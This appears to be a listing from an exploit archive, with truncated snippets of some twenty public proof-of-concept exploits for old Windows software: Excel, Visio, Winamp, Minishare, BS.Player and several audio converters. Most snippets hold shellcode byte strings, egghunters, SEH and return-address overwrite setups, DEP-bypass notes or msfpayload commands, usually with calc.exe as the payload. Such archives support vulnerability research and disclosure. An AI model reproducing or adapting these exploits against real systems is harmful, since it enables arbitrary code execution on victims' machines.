Microsoft-Excel-OBJ-Record
Title: Microsoft Excel OBJ Record Stack Overflow Version: Excel 2002 and XP SP3 Analysis: http://www.abysssec.com import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:36640 str2 = strTotal37440: shellcode calc.exe shellcode =...
DJ-Studio-Pro-8.1.3.2.1
DJ Studio Pro Version 8.1.3.2.1 SEH 0 day Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ filename = "ASL.pls" windows/exec - CMD=calc.exe shellcode = "\x41\x42\x48\x49\x41\x42\x48\x49" Egg Hunted...
Excel-RTD-Memory-Corruption
Analysis: http://www.abysssec.com Vendor: http://www.microsoft.com Impact: Critical import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:4509 str2 = strTotal5013:15000 str3 = strTotal15800: eip = "\xAd\x57\x00\x30" pop pop ret jmp = "\xF7\xC2\x03\x30" call esp...
Acoustica-MP3-Audio-Mixer-2.471
The software doesn't correctly handle the M3U's header and extra info when it is being imported on an open sound group. Trigger: launch app, open an existing sound group, i.e. C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp then import the crash.m3u and....KaaaaBooom!! magic = "crash.m3u" vuln =...
Microsoft-Office-Visio-DXF
Title: Microsoft Office Visio DXF File Stack based Overflow Version: Microsoft Office Visio 2002xp Analysis: http://www.abysssec.com import sys def main: try: fdR = open'src.dxf', 'rb+' strTotal = fdR.read str1 = strTotal:100 str2 = strTotal1020:1124 str3 = strTotal1128:1169 str4 = strTotal1173:...
Minishare-1.5.5-Buffer-Overflow
Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability users.txt Date: 11/02/2010 Author: Chris Gabriel Software Link: http://sourceforge.net/projects/minishare Version: 1.4.0 - 1.5.5 shellcode = "TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D" "QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"...
Winamp-5.5.8-(in_mod-plugin)
Pwn And Beans by Mighty-D presents: Winamp 5.5.8.2985 in_mod plugin Stack Overflow WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet Bug found by http://www.exploit-db.com/exploits/15248/ POC by fdisk header =...
Minishare-1.5.5-BoF
Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability users.txt - EggHunter Version Date: 11/19/2010 Author: 0v3r Bug Found By: Chris Gabriel Software Link: http://sourceforge.net/projects/minishare egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"...
MP3-Nator-Buffer-Overflow
Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://files.brothersoft.com/mp3audio/players/mp3nator.zip filename = 'crash.plf' ./msfpayload windows/exec CMD=calc EXITFUNC=seh R |...
DIZzy-1.12-Local
Exploit Title: DIZzy 1.12 Local Stack Overflow Google Dork: n/a Date: 17/11/2010 Author: g30rg3x shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" + "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" + "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" +...
Realtek-HD-Audio-Control-Panel-2.1.3.2
App. has classic buffer overflow vulnerability; it can be triggered by passing a too long argument as a startup parameter. Shellcode can be run via classic ret overwrite or SEH Handler overwrite filepath = "C:\ShellCode\RTHDCPL 2.1.3.2 - Exploit.bin" f = openfilepath, "wb" f.write'A'4...
Realtek-Audio-Microphone-Calibration-1.1.1.6
App. has classic buffer overflow vulnerability; it can be triggered by passing too long argument as a startup parameter. Shellcode can be run via classic ret overwrite or SEH Handler overwrite filepath = "C:\ShellCode\MicCal 1.1.1.6 - Exploit.bin" f = openfilepath, "wb" dummy data f.write'\x90'...
Free-CD-to-MP3-Converter-3.1
Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit SEH Date: 10/18/10 Credit/Bug found by: C4SS!0 G0M3S Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe filename = 'crash.wav' windows/exec - 144 bytes http://www.metasploit.com Encoder: x86/shikata_ga_nai...
BS.Player-2.57-SEH
Exploit Title: Exploit Buffer Overflow Bsplayer 2.57UNICODE-SEH Date: 01\07\2010 Author: C4SS!0 G0M3S Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 import os import sys import time import string os.system"cls" os.system"color 4f" def usage: iflensys.argv!=3 or...
CoolPlayer-2.18-DEP-Bypass
Tested on: Windows XP SP3 running in Virtualbox Uses SetProcessDEPPolicy to disable DEP for the process Thanks to mrme for the encouragement Exploit-DB Notes: May not work on all Win XP SP3 machines windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available shellcode =...
MP3-CD-Converter-Professional-BoF-(SEH)
Exploit Title: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH Date: 12/20/2010 Author: C4SS!0 G0M3S Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe Version: 5.0.3 import os import sys import struct import time def usage: os.system"cls" os.system"color 4f" print"\n"...
xRadio-0.95b-(.xrl)
xRadio is affected by stack-based buffer overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successful exploitation of the vulnerability allows an attacker to execute arbitrary code. Other versions are also affected but have a different trigger...
AOL-9.5-(rtx)-Local-Buffer-Overflow
Bug : AOL 9.5 rtx Local Buffer Overflow Exploit by sup3r Tested on : XP SP3 header1 = "\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a" "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41" "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"...
NetZip-Classic-SEH
Exploit Title: Exploit Buffer Overflow NetZip ClassicSEH Date: 01\30\2011 Author: C4SS!0 G0M3S Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html Version: 7.5.1.86 Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN def usage system"cls" system"color 4f"; end if ARGV.length !=1 usage...
Nokia-Multimedia-Player-1.0
Exploit Title: Nokia Multimedia player SEH Unicode Date: January 11 2011 Author: Carlos Mario Penagos Hollmann Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html Version: 1.00.55.5010 junk="\x44" 2660 shellcode =...